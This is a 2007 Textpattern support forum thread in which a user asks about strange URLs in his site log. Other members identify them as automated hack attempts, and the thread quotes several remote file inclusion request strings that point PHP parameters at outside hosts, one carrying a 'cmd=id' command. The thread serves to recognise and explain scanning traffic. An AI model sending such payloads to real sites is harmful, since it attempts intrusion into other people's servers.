Funny URLs appearing in log

masa · 2007-05-06 15:10:17

Hi there,

lately I’ve noticed an increasing number of strange URLs appearing in the log’s Page column, for instance:

index.php?file=http://www.vesa.lv/file.txt?
index.php?file=http://perdu.ch/cgi-bin/echo?
index.php?file=http://www.eusians.com/images/about.jpg?

Following the http: part usually brings up an empty page or an error message.

Does anyone have an idea what’s going on here? Is it something to be concerned about?

Cheers Martin

hcgtv · 2007-05-06 16:58:47

I’ve been seeing the same thing also, they are hack attempts.

My PHPXref site, which has source code for so many projects, is a magnet for script kiddies.

/show_archives.php?template=http://www.pikspiller.dk/stats/format/status.txt?
index.php?temp=http://www.vesa.lv/file.txt?
/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=http://www.tritonzao.by.ru/cmd.txt?&cmd=id
/include/main.php?config[search_disp]=true&include_dir=http://perdu.ch/cgi-bin/echo?
/modules/xoopsgallery/upgrade_ album.php?GALLERY_BASEDIR=http://www.abschleppdienst-viersen .de/templates/mp_ferro/images/freeman.txt?
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://www.treibball.de/images/about.jpg??
/components/com_smf/smf.php?mosConfig_absolute_path=http://www.keithiansmith.com/mike/mike.txt?

So far, Textpattern is holding up just fine.

zem · 2007-05-06 23:13:53

FAQ

“Attempted security breaches are a daily occurrence at popular web sites. Vandals regularly scan thousands of web sites at a time for known security holes in common software. Only a small fraction of those sites will be vulnerable. On sites that aren’t, the only side effect will usually be a puzzling entry in the traffic log.”

Textpattern CMS

Textpattern CMS support forum

#1 2007-05-06 15:10:17

Funny URLs appearing in log

#2 2007-05-06 16:58:47

Re: Funny URLs appearing in log

#3 2007-05-06 23:13:53

Re: Funny URLs appearing in log

Board footer